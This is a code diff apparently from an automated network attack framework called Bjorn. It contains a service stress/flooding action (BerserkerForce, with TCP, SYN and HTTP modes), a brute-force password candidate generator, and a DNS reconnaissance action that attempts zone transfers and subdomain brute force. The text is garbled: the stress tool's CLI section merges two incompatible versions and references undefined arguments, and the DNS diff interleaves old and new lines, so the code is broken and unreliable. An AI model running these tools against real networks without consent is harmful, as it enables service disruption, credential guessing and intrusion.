safe_ip = ip.replace(":", "_").replace(".", "_")
filename = f"{safe_ip}_{ts}.json"
filepath = os.path.join(OUTPUT_DIR, filename)
report = {
"tool": "berserker_force",
"version": b_version,
"timestamp": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"),
"target": ip,
"config": {
"mode": mode,
"duration_s": duration_s,
"rate_per_s": rate,
"scapy_available": _HAS_SCAPY,
},
"analysis": analysis,
}
try:
with open(filepath, "w") as fh:
json.dump(report, fh, indent=2, default=str)
logger.info(f"Report saved to {filepath}")
except Exception as exc:
logger.error(f"Failed to write report {filepath}: {exc}")
return filepath
# ------------------------------------------------------------------ #
# Orchestrator entry point #
# ------------------------------------------------------------------ #
def execute(self, ip: str, port, row: Dict, status_key: str) -> str:
"""
Main entry point called by the Bjorn orchestrator.
Returns 'success', 'failed', or 'interrupted'.
"""
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# --- Identity cache from row -----------------------------------------
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
# --- Resolve target ports --------------------------------------------
ports = self._resolve_ports(ip, port, row)
if not ports:
logger.warning(f"BerserkerForce: no ports resolved for {ip}")
return "failed"
# --- Read runtime config from shared_data ----------------------------
mode = str(getattr(self.shared_data, "berserker_mode", "tcp") or "tcp").lower()
if mode not in ("tcp", "syn", "http", "mixed"):
mode = "tcp"
duration_s = max(10, min(int(getattr(self.shared_data, "berserker_duration", 30) or 30), 120))
rate = max(1, min(int(getattr(self.shared_data, "berserker_rate", 20) or 20), _MAX_RATE))
# --- EPD / UI updates ------------------------------------------------
self.shared_data.bjorn_orch_status = "berserker_force"
self.shared_data.bjorn_status_text2 = f"{ip} ({len(ports)} ports)"
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports)), "mode": mode}
# Total units for progress: baseline(15) + stress(70) + post-baseline(10) + analysis(5)
self.shared_data.bjorn_progress = "0%"
try:
# ============================================================== #
# Phase 1: Pre-stress baseline (0 - 15%) #
# ============================================================== #
logger.info(f"Phase 1/4: pre-stress baseline for {ip} on {len(ports)} ports")
self.shared_data.comment_params = {"ip": ip, "phase": "baseline"}
self.shared_data.log_milestone(b_class, "BaselineStart", f"Measuring {len(ports)} ports")
pre_baseline = self._measure_baseline(ip, ports)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "15%"
# ============================================================== #
# Phase 2: Stress test (15 - 85%) #
# ============================================================== #
logger.info(f"Phase 2/4: stress test ({mode}, {duration_s}s, {rate} req/s)")
self.shared_data.comment_params = {
"ip": ip,
"phase": "stress",
"mode": mode,
"rate": str(rate),
}
self.shared_data.log_milestone(b_class, "StressActive", f"Mode: {mode} | Duration: {duration_s}s")
# Build a dummy ProgressTracker just for internal bookkeeping;
# we do fine-grained progress updates ourselves.
progress = ProgressTracker(self.shared_data, 100)
stress_results = self._run_stress(
ip=ip,
ports=ports,
mode=mode,
duration_s=duration_s,
rate=rate,
progress=progress,
stress_progress_start=15,
stress_progress_span=70,
)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "85%"
# ============================================================== #
# Phase 3: Post-stress baseline (85 - 95%) #
# ============================================================== #
logger.info(f"Phase 3/4: post-stress baseline for {ip}")
self.shared_data.comment_params = {"ip": ip, "phase": "post-baseline"}
self.shared_data.log_milestone(b_class, "RecoveryMeasure", f"Checking {ip} after stress")
post_baseline = self._measure_baseline(ip, ports)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "95%"
# ============================================================== #
# Phase 4: Analysis & report (95 - 100%) #
# ============================================================== #
logger.info("Phase 4/4: analyzing results")
self.shared_data.comment_params = {"ip": ip, "phase": "analysis"}
analysis = self._analyze(pre_baseline, post_baseline, stress_results, ports)
report_path = self._save_report(ip, mode, duration_s, rate, analysis)
self.shared_data.bjorn_progress = "100%"
# Final UI update
avg_deg = analysis.get("summary", {}).get("avg_degradation_pct", 0.0)
self.shared_data.log_milestone(b_class, "Complete", f"Avg Degradation: {avg_deg}% | Report: {os.path.basename(report_path)}")
return "success"
except Exception as exc:
logger.error(f"BerserkerForce failed for {ip}: {exc}", exc_info=True)
return "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug / manual) ---------------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="BerserkerForce (service resilience tester)")
parser.add_argument("--ip", required=True, help="Target IP address")
parser.add_argument("--port", default="", help="Specific port (optional; uses row/DB otherwise)")
parser.add_argument("--mode", default="tcp", choices=["tcp", "syn", "http", "mixed"])
parser.add_argument("--duration", type=int, default=30, help="Stress duration in seconds")
parser.add_argument("--rate", type=int, default=20, help="Probes per second (max 50)")
args = parser.parse_args()
settings = load_settings()
target = args.target or settings.get("target")
ports = [int(p) for p in args.ports.split(',')] if args.ports else settings.get("ports", DEFAULT_PORTS)
mode = args.mode or settings.get("mode")
rate = args.rate or settings.get("rate")
output_dir = args.output or settings.get("output_dir")
sd = SharedData()
# Push CLI args into shared_data so the action reads them
sd.berserker_mode = args.mode
sd.berserker_duration = args.duration
sd.berserker_rate = args.rate
if not target:
logging.error("Target is required. Use -t or save it in settings")
return
act = BerserkerForce(sd)
save_settings(target, ports, mode, rate, output_dir)
row = {
"MAC Address": getattr(sd, "get_raspberry_mac", lambda: "__GLOBAL__")() or "__GLOBAL__",
"Hostname": "",
"Ports": args.port,
}
berserker = BerserkerForce(
target=target,
ports=ports,
mode=mode,
rate=rate,
output_dir=output_dir
)
try:
threads = berserker.start()
logging.info(f"Stress testing started against {target}")
while True:
time.sleep(1)
except KeyboardInterrupt:
logging.info("Stopping stress test...")
berserker.stop()
for thread in threads:
thread.join()
if __name__ == "__main__":
main()
result = act.execute(args.ip, args.port, row, "berserker_force")
print(f"Result: {result}")

View File

@@ -0,0 +1,114 @@
import itertools
import threading
import time
from typing import Iterable, List, Sequence
def _unique_keep_order(items: Iterable[str]) -> List[str]:
seen = set()
out: List[str] = []
for raw in items:
s = str(raw or "")
if s in seen:
continue
seen.add(s)
out.append(s)
return out
def build_exhaustive_passwords(shared_data, existing_passwords: Sequence[str]) -> List[str]:
"""
Build optional exhaustive password candidates from runtime config.
Returns a bounded list (max_candidates) to stay Pi Zero friendly.
"""
if not bool(getattr(shared_data, "bruteforce_exhaustive_enabled", False)):
return []
min_len = int(getattr(shared_data, "bruteforce_exhaustive_min_length", 1))
max_len = int(getattr(shared_data, "bruteforce_exhaustive_max_length", 4))
max_candidates = int(getattr(shared_data, "bruteforce_exhaustive_max_candidates", 2000))
require_mix = bool(getattr(shared_data, "bruteforce_exhaustive_require_mix", False))
min_len = max(1, min_len)
max_len = max(min_len, min(max_len, 8))
max_candidates = max(0, min(max_candidates, 200000))
if max_candidates == 0:
return []
use_lower = bool(getattr(shared_data, "bruteforce_exhaustive_lowercase", True))
use_upper = bool(getattr(shared_data, "bruteforce_exhaustive_uppercase", True))
use_digits = bool(getattr(shared_data, "bruteforce_exhaustive_digits", True))
use_symbols = bool(getattr(shared_data, "bruteforce_exhaustive_symbols", False))
symbols = str(getattr(shared_data, "bruteforce_exhaustive_symbols_chars", "!@#$%^&*"))
groups: List[str] = []
if use_lower:
groups.append("abcdefghijklmnopqrstuvwxyz")
if use_upper:
groups.append("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
if use_digits:
groups.append("0123456789")
if use_symbols and symbols:
groups.append(symbols)
if not groups:
return []
charset = "".join(groups)
existing = set(str(x) for x in (existing_passwords or []))
generated: List[str] = []
for ln in range(min_len, max_len + 1):
for tup in itertools.product(charset, repeat=ln):
pwd = "".join(tup)
if pwd in existing:
continue
if require_mix and len(groups) > 1:
if not all(any(ch in grp for ch in pwd) for grp in groups):
continue
generated.append(pwd)
if len(generated) >= max_candidates:
return generated
return generated
class ProgressTracker:
"""
Thread-safe progress helper for bruteforce actions.
"""
def __init__(self, shared_data, total_attempts: int):
self.shared_data = shared_data
self.total = max(1, int(total_attempts))
self.attempted = 0
self._lock = threading.Lock()
self._last_emit = 0.0
self.shared_data.bjorn_progress = "0%"
def advance(self, step: int = 1):
now = time.time()
with self._lock:
self.attempted += max(1, int(step))
attempted = self.attempted
total = self.total
if now - self._last_emit < 0.2 and attempted < total:
return
self._last_emit = now
pct = min(100, int((attempted * 100) / total))
self.shared_data.bjorn_progress = f"{pct}%"
def set_complete(self):
self.shared_data.bjorn_progress = "100%"
def clear(self):
self.shared_data.bjorn_progress = ""
def merged_password_plan(shared_data, dictionary_passwords: Sequence[str]) -> tuple[list[str], list[str]]:
"""
Returns (dictionary_passwords, fallback_passwords) with uniqueness preserved.
Fallback list is empty unless exhaustive mode is enabled.
"""
dictionary = _unique_keep_order(dictionary_passwords or [])
fallback = build_exhaustive_passwords(shared_data, dictionary)
return dictionary, _unique_keep_order(fallback)

View File

@@ -1,175 +1,837 @@
# DNS Pillager for reconnaissance and enumeration of DNS infrastructure.
# Saves settings in `/home/bjorn/.settings_bjorn/dns_pillager_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -d, --domain Target domain for enumeration (overrides saved value).
# -w, --wordlist Path to subdomain wordlist (default: built-in list).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/dns).
# -t, --threads Number of threads for scanning (default: 10).
# -r, --recursive Enable recursive enumeration of discovered subdomains.
"""
dns_pillager.py - DNS reconnaissance and enumeration action for Bjorn.
Performs comprehensive DNS intelligence gathering on discovered hosts:
- Reverse DNS lookup on target IP
- Full DNS record enumeration (A, AAAA, MX, NS, TXT, CNAME, SOA, SRV, PTR)
- Zone transfer (AXFR) attempts against discovered nameservers
- Subdomain brute-force enumeration with threading
SQL mode:
- Targets provided by the orchestrator (ip + port)
- IP -> (MAC, hostname) mapping read from DB 'hosts'
- Discovered hostnames are written back to DB hosts table
- Results saved as JSON in data/output/dns/
- Action status recorded in DB.action_results (via DNSPillager.execute)
"""
import os
import json
import dns.resolver
import threading
import argparse
from concurrent.futures import ThreadPoolExecutor
from datetime import datetime
import socket
import logging
import threading
import time
import datetime
from typing import Dict, List, Optional, Tuple, Set
from concurrent.futures import ThreadPoolExecutor, as_completed
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="dns_pillager.py", level=logging.DEBUG)
b_class = "DNSPillager"
b_module = "dns_pillager"
b_enabled = 0
# ---------------------------------------------------------------------------
# Graceful import for dnspython (socket fallback if unavailable)
# ---------------------------------------------------------------------------
_HAS_DNSPYTHON = False
try:
import dns.resolver
import dns.zone
import dns.query
import dns.reversename
import dns.rdatatype
import dns.exception
_HAS_DNSPYTHON = True
logger.info("dnspython library loaded successfully.")
except ImportError:
logger.warning(
"dnspython not installed. DNS operations will use socket fallback "
"(limited functionality). Install with: pip install dnspython"
)
# ---------------------------------------------------------------------------
# Action metadata (AST-friendly, consumed by sync_actions / orchestrator)
# ---------------------------------------------------------------------------
b_class = "DNSPillager"
b_module = "dns_pillager"
b_status = "dns_pillager"
b_port = 53
b_service = '["dns"]'
b_trigger = 'on_any:["on_host_alive","on_new_port:53"]'
b_parent = None
b_action = "normal"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 20
b_cooldown = 7200
b_rate_limit = "5/86400"
b_timeout = 300
b_max_retries = 2
b_stealth_level = 7
b_risk_level = "low"
b_enabled = 1
b_tags = ["dns", "recon", "enumeration"]
b_category = "recon"
b_name = "DNS Pillager"
b_description = (
"Comprehensive DNS reconnaissance and enumeration action. "
"Performs reverse DNS, record enumeration (A/AAAA/MX/NS/TXT/CNAME/SOA/SRV/PTR), "
"zone transfer attempts, and subdomain brute-force discovery. "
"Requires: dnspython (pip install dnspython) for full functionality; "
"falls back to socket-based lookups if unavailable."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "DNSPillager.png"
b_args = {
"threads": {
"type": "number",
"label": "Subdomain Threads",
"min": 1,
"max": 50,
"step": 1,
"default": 10,
"help": "Number of threads for subdomain brute-force enumeration."
},
"wordlist": {
"type": "text",
"label": "Subdomain Wordlist",
"default": "",
"placeholder": "/path/to/wordlist.txt",
"help": "Path to a custom subdomain wordlist file. Leave empty for built-in list (~100 entries)."
},
"timeout": {
"type": "number",
"label": "DNS Query Timeout (s)",
"min": 1,
"max": 30,
"step": 1,
"default": 3,
"help": "Timeout in seconds for individual DNS queries."
},
"enable_axfr": {
"type": "checkbox",
"label": "Attempt Zone Transfer (AXFR)",
"default": True,
"help": "Try AXFR zone transfers against discovered nameservers."
},
"enable_subdomains": {
"type": "checkbox",
"label": "Enable Subdomain Brute-Force",
"default": True,
"help": "Enumerate subdomains using wordlist."
},
}
b_examples = [
{"threads": 10, "wordlist": "", "timeout": 3, "enable_axfr": True, "enable_subdomains": True},
{"threads": 5, "wordlist": "/home/bjorn/wordlists/subdomains.txt", "timeout": 5, "enable_axfr": False, "enable_subdomains": True},
]
b_docs_url = "docs/actions/DNSPillager.md"
# ---------------------------------------------------------------------------
# Data directories
# ---------------------------------------------------------------------------
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "dns")
# ---------------------------------------------------------------------------
# Built-in subdomain wordlist (~100 common entries)
# ---------------------------------------------------------------------------
BUILTIN_SUBDOMAINS = [
"www", "mail", "ftp", "localhost", "webmail", "smtp", "pop", "ns1", "ns2",
"ns3", "ns4", "dns", "dns1", "dns2", "mx", "mx1", "mx2", "imap", "pop3",
"blog", "dev", "staging", "test", "testing", "beta", "alpha", "demo",
"admin", "administrator", "panel", "cpanel", "webmin", "portal",
"api", "api2", "api3", "gateway", "gw", "proxy", "cdn", "media",
"static", "assets", "img", "images", "files", "download", "upload",
"vpn", "remote", "ssh", "rdp", "citrix", "owa", "exchange",
"db", "database", "mysql", "postgres", "sql", "mongodb", "redis", "elastic",
"shop", "store", "app", "apps", "mobile", "m",
"intranet", "extranet", "internal", "external", "private", "public",
"cloud", "aws", "azure", "gcp", "s3", "storage",
"git", "gitlab", "github", "svn", "repo", "ci", "cd", "jenkins", "build",
"monitor", "monitoring", "grafana", "prometheus", "kibana", "nagios", "zabbix",
"log", "logs", "syslog", "elk",
"chat", "slack", "teams", "jira", "confluence", "wiki",
"backup", "backups", "bak", "archive",
"secure", "security", "sso", "auth", "login", "oauth",
"docs", "doc", "help", "support", "kb", "status",
"calendar", "crm", "erp", "hr",
"web", "web1", "web2", "server", "server1", "server2",
"host", "node", "worker", "master",
]
# DNS record types to enumerate
DNS_RECORD_TYPES = ["A", "AAAA", "MX", "NS", "TXT", "CNAME", "SOA", "SRV", "PTR"]
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/dns"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "dns_pillager_settings.json")
DEFAULT_RECORD_TYPES = ['A', 'AAAA', 'MX', 'NS', 'TXT', 'CNAME', 'SOA']
class DNSPillager:
def __init__(self, domain, wordlist=None, output_dir=DEFAULT_OUTPUT_DIR, threads=10, recursive=False):
self.domain = domain
self.wordlist = wordlist
self.output_dir = output_dir
self.threads = threads
self.recursive = recursive
self.discovered_domains = set()
self.lock = threading.Lock()
self.resolver = dns.resolver.Resolver()
self.resolver.timeout = 1
self.resolver.lifetime = 1
"""
DNS reconnaissance action for the Bjorn orchestrator.
Performs reverse DNS, record enumeration, zone transfer attempts,
and subdomain brute-force discovery.
"""
def save_results(self, results):
"""Save enumeration results to a JSON file."""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
# IP -> (MAC, hostname) identity cache from DB
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
# DNS resolver setup (dnspython)
self._resolver = None
if _HAS_DNSPYTHON:
self._resolver = dns.resolver.Resolver()
self._resolver.timeout = 3
self._resolver.lifetime = 5
# Ensure output directory exists
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
filename = os.path.join(self.output_dir, f"dns_enum_{timestamp}.json")
with open(filename, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {filename}")
os.makedirs(OUTPUT_DIR, exist_ok=True)
except Exception as e:
logging.error(f"Failed to save results: {e}")
logger.error(f"Failed to create output directory {OUTPUT_DIR}: {e}")
def query_domain(self, domain, record_type):
"""Query a domain for specific DNS record type."""
# Thread safety
self._lock = threading.Lock()
logger.info("DNSPillager initialized (dnspython=%s)", _HAS_DNSPYTHON)
# --------------------- Identity cache (hosts) ---------------------
def _refresh_ip_identity_cache(self) -> None:
"""Rebuild IP -> (MAC, current_hostname) from DB.hosts."""
self._ip_to_identity.clear()
try:
answers = self.resolver.resolve(domain, record_type)
return [str(answer) for answer in answers]
except:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip_addr in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip_addr] = (mac, current_hn)
def _mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def _hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# --------------------- Public API (Orchestrator) ---------------------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""
Execute DNS reconnaissance on the given target.
Args:
ip: Target IP address
port: Target port (typically 53)
row: Row dict from orchestrator (contains MAC, hostname, etc.)
status_key: Status tracking key
Returns:
'success' | 'failed' | 'interrupted'
"""
self.shared_data.bjorn_orch_status = "DNSPillager"
self.shared_data.bjorn_progress = "0%"
self.shared_data.comment_params = {"ip": ip, "port": str(port), "phase": "init"}
results = {
"target_ip": ip,
"port": str(port),
"timestamp": datetime.datetime.now().isoformat(),
"reverse_dns": None,
"domain": None,
"records": {},
"zone_transfer": {},
"subdomains": [],
"errors": [],
}
try:
# --- Check for early exit ---
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal before start.")
return "interrupted"
mac = row.get("MAC Address") or row.get("mac_address") or self._mac_for_ip(ip) or ""
hostname = (
row.get("Hostname") or row.get("hostname")
or self._hostname_for_ip(ip)
or ""
)
# =========================================================
# Phase 1: Reverse DNS lookup (0% -> 10%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "reverse_dns"}
logger.info(f"[{ip}] Phase 1: Reverse DNS lookup")
reverse_hostname = self._reverse_dns(ip)
if reverse_hostname:
results["reverse_dns"] = reverse_hostname
logger.info(f"[{ip}] Reverse DNS: {reverse_hostname}")
self.shared_data.log_milestone(b_class, "ReverseDNS", f"IP: {ip} -> {reverse_hostname}")
# Update hostname if we found something new
if not hostname or hostname == ip:
hostname = reverse_hostname
else:
logger.info(f"[{ip}] No reverse DNS result.")
self.shared_data.bjorn_progress = "10%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 2: Extract domain and enumerate DNS records (10% -> 35%)
# =========================================================
domain = self._extract_domain(hostname)
results["domain"] = domain
if domain:
self.shared_data.comment_params = {"ip": ip, "phase": "records", "domain": domain}
logger.info(f"[{ip}] Phase 2: DNS record enumeration for {domain}")
self.shared_data.log_milestone(b_class, "EnumerateRecords", f"Domain: {domain}")
record_results = {}
total_types = len(DNS_RECORD_TYPES)
for idx, rtype in enumerate(DNS_RECORD_TYPES):
if self.shared_data.orchestrator_should_exit:
return "interrupted"
records = self._query_records(domain, rtype)
if records:
record_results[rtype] = records
logger.info(f"[{ip}] {rtype} records for {domain}: {records}")
# Progress: 10% -> 35% across record types
pct = 10 + int((idx + 1) / total_types * 25)
self.shared_data.bjorn_progress = f"{pct}%"
results["records"] = record_results
else:
logger.warning(f"[{ip}] No domain could be extracted. Skipping record enumeration.")
self.shared_data.bjorn_progress = "35%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 3: Zone transfer (AXFR) attempt (35% -> 45%)
# =========================================================
self.shared_data.bjorn_progress = "35%"
self.shared_data.comment_params = {"ip": ip, "phase": "zone_transfer", "domain": domain or ip}
if domain and _HAS_DNSPYTHON:
logger.info(f"[{ip}] Phase 3: Zone transfer attempt for {domain}")
nameservers = results["records"].get("NS", [])
# Also try the target IP itself as a nameserver
ns_targets = list(set(nameservers + [ip]))
zone_results = {}
for ns_idx, ns in enumerate(ns_targets):
if self.shared_data.orchestrator_should_exit:
return "interrupted"
axfr_records = self._attempt_zone_transfer(domain, ns)
if axfr_records:
zone_results[ns] = axfr_records
logger.success(f"[{ip}] Zone transfer SUCCESS from {ns}: {len(axfr_records)} records")
self.shared_data.log_milestone(b_class, "AXFRSuccess", f"NS: {ns} | Records: {len(axfr_records)}")
# Progress within 35% -> 45%
if ns_targets:
pct = 35 + int((ns_idx + 1) / len(ns_targets) * 10)
self.shared_data.bjorn_progress = f"{pct}%"
results["zone_transfer"] = zone_results
else:
if not _HAS_DNSPYTHON:
results["errors"].append("Zone transfer skipped: dnspython not available")
elif not domain:
results["errors"].append("Zone transfer skipped: no domain found")
logger.info(f"[{ip}] Skipping zone transfer (dnspython={_HAS_DNSPYTHON}, domain={domain})")
self.shared_data.bjorn_progress = "45%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 4: Subdomain brute-force (45% -> 95%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "subdomains", "domain": domain or ip}
if domain:
logger.info(f"[{ip}] Phase 4: Subdomain brute-force for {domain}")
self.shared_data.log_milestone(b_class, "SubdomainEnum", f"Domain: {domain}")
wordlist = self._load_wordlist()
thread_count = min(10, max(1, len(wordlist)))
discovered = self._enumerate_subdomains(domain, wordlist, thread_count)
results["subdomains"] = discovered
logger.info(f"[{ip}] Subdomain enumeration found {len(discovered)} live subdomains")
else:
logger.info(f"[{ip}] Skipping subdomain enumeration: no domain available")
results["errors"].append("Subdomain enumeration skipped: no domain found")
self.shared_data.bjorn_progress = "95%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 5: Save results and update DB (95% -> 100%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "saving"}
logger.info(f"[{ip}] Phase 5: Saving results")
# Save JSON output
self._save_results(ip, results)
# Update DB hostname if reverse DNS discovered new data
if reverse_hostname and mac:
self._update_db_hostname(mac, ip, reverse_hostname)
self.shared_data.bjorn_progress = "100%"
self.shared_data.log_milestone(b_class, "Complete", f"Records: {sum(len(v) for v in results['records'].values())} | Subdomains: {len(results['subdomains'])}")
# Summary comment
record_count = sum(len(v) for v in results["records"].values())
zone_count = sum(len(v) for v in results["zone_transfer"].values())
sub_count = len(results["subdomains"])
self.shared_data.comment_params = {
"ip": ip,
"domain": domain or "N/A",
"records": str(record_count),
"zones": str(zone_count),
"subdomains": str(sub_count),
}
logger.success(
f"[{ip}] DNS Pillager complete: domain={domain}, "
f"records={record_count}, zone_transfers={zone_count}, subdomains={sub_count}"
)
return "success"
except Exception as e:
logger.error(f"[{ip}] DNSPillager execute failed: {e}")
results["errors"].append(str(e))
# Still try to save partial results
try:
self._save_results(ip, results)
except Exception:
pass
return "failed"
finally:
self.shared_data.bjorn_progress = ""
# --------------------- Reverse DNS ---------------------
def _reverse_dns(self, ip: str) -> Optional[str]:
"""Perform reverse DNS lookup on the IP address."""
# Try dnspython first
if _HAS_DNSPYTHON and self._resolver:
try:
rev_name = dns.reversename.from_address(ip)
answers = self._resolver.resolve(rev_name, "PTR")
for rdata in answers:
hostname = str(rdata).rstrip(".")
if hostname:
return hostname
except Exception as e:
logger.debug(f"dnspython reverse DNS failed for {ip}: {e}")
# Socket fallback
try:
hostname, _, _ = socket.gethostbyaddr(ip)
if hostname and hostname != ip:
return hostname
except (socket.herror, socket.gaierror, OSError) as e:
logger.debug(f"Socket reverse DNS failed for {ip}: {e}")
return None
# --------------------- Domain extraction ---------------------
@staticmethod
def _extract_domain(hostname: str) -> Optional[str]:
"""
Extract the registerable domain from a hostname.
e.g., 'mail.sub.example.com' -> 'example.com'
'host1.internal.lan' -> 'internal.lan'
'192.168.1.1' -> None
"""
if not hostname:
return None
# Skip raw IPs
hostname = hostname.strip().rstrip(".")
parts = hostname.split(".")
if len(parts) < 2:
return None
# Check if it looks like an IP address
try:
socket.inet_aton(hostname)
return None # It's an IP, not a hostname
except (socket.error, OSError):
pass
# For simple TLDs, take the last 2 parts
# For compound TLDs (co.uk, com.au), take the last 3 parts
compound_tlds = {
"co.uk", "co.jp", "co.kr", "co.nz", "co.za", "co.in",
"com.au", "com.br", "com.cn", "com.mx", "com.tw",
"org.uk", "net.au", "ac.uk", "gov.uk",
}
if len(parts) >= 3:
possible_compound = f"{parts[-2]}.{parts[-1]}"
if possible_compound.lower() in compound_tlds:
return ".".join(parts[-3:])
return ".".join(parts[-2:])
# --------------------- DNS record queries ---------------------
def _query_records(self, domain: str, record_type: str) -> List[str]:
"""Query DNS records of a given type for a domain."""
records = []
# Try dnspython first
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(domain, record_type)
for rdata in answers:
value = str(rdata).rstrip(".")
if value:
records.append(value)
return records
except dns.resolver.NXDOMAIN:
logger.debug(f"NXDOMAIN for {domain} {record_type}")
except dns.resolver.NoAnswer:
logger.debug(f"No answer for {domain} {record_type}")
except dns.resolver.NoNameservers:
logger.debug(f"No nameservers for {domain} {record_type}")
except dns.exception.Timeout:
logger.debug(f"Timeout querying {domain} {record_type}")
except Exception as e:
logger.debug(f"dnspython query failed for {domain} {record_type}: {e}")
# Socket fallback (limited to A records only)
if record_type == "A" and not records:
try:
ips = socket.getaddrinfo(domain, None, socket.AF_INET, socket.SOCK_STREAM)
for info in ips:
addr = info[4][0]
if addr and addr not in records:
records.append(addr)
except (socket.gaierror, OSError) as e:
logger.debug(f"Socket fallback failed for {domain} A: {e}")
# Socket fallback for AAAA
if record_type == "AAAA" and not records:
try:
ips = socket.getaddrinfo(domain, None, socket.AF_INET6, socket.SOCK_STREAM)
for info in ips:
addr = info[4][0]
if addr and addr not in records:
records.append(addr)
except (socket.gaierror, OSError) as e:
logger.debug(f"Socket fallback failed for {domain} AAAA: {e}")
return records
# --------------------- Zone transfer (AXFR) ---------------------
def _attempt_zone_transfer(self, domain: str, nameserver: str) -> List[Dict]:
"""
Attempt an AXFR zone transfer from a nameserver.
Returns a list of record dicts on success, empty list on failure.
"""
if not _HAS_DNSPYTHON:
return []
def enumerate_domain(self, subdomain):
"""Enumerate a single subdomain for all record types."""
full_domain = f"{subdomain}.{self.domain}" if subdomain else self.domain
results = {'domain': full_domain, 'records': {}}
records = []
# Resolve NS hostname to IP if needed
ns_ip = self._resolve_ns_to_ip(nameserver)
if not ns_ip:
logger.debug(f"Cannot resolve NS {nameserver} to IP, skipping AXFR")
return []
for record_type in DEFAULT_RECORD_TYPES:
records = self.query_domain(full_domain, record_type)
if records:
results['records'][record_type] = records
with self.lock:
self.discovered_domains.add(full_domain)
logging.info(f"Found {record_type} records for {full_domain}")
return results if results['records'] else None
def load_wordlist(self):
"""Load subdomain wordlist or use built-in list."""
if self.wordlist and os.path.exists(self.wordlist):
with open(self.wordlist, 'r') as f:
return [line.strip() for line in f if line.strip()]
return ['www', 'mail', 'remote', 'blog', 'webmail', 'server', 'ns1', 'ns2', 'smtp', 'secure']
def execute(self):
"""Execute the DNS enumeration process."""
results = {'timestamp': datetime.now().isoformat(), 'findings': []}
subdomains = self.load_wordlist()
logging.info(f"Starting DNS enumeration for {self.domain}")
with ThreadPoolExecutor(max_workers=self.threads) as executor:
enum_results = list(filter(None, executor.map(self.enumerate_domain, subdomains)))
results['findings'].extend(enum_results)
if self.recursive and self.discovered_domains:
logging.info("Starting recursive enumeration")
new_domains = set()
for domain in self.discovered_domains:
if domain != self.domain:
new_subdomains = [d.split('.')[0] for d in domain.split('.')[:-2]]
new_domains.update(new_subdomains)
if new_domains:
enum_results = list(filter(None, executor.map(self.enumerate_domain, new_domains)))
results['findings'].extend(enum_results)
self.save_results(results)
return results
def save_settings(domain, wordlist, output_dir, threads, recursive):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"domain": domain,
"wordlist": wordlist,
"output_dir": output_dir,
"threads": threads,
"recursive": recursive
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
zone = dns.zone.from_xfr(
dns.query.xfr(ns_ip, domain, timeout=10, lifetime=30)
)
for name, node in zone.nodes.items():
for rdataset in node.rdatasets:
for rdata in rdataset:
records.append({
"name": str(name),
"type": dns.rdatatype.to_text(rdataset.rdtype),
"ttl": rdataset.ttl,
"value": str(rdata),
})
except dns.exception.FormError:
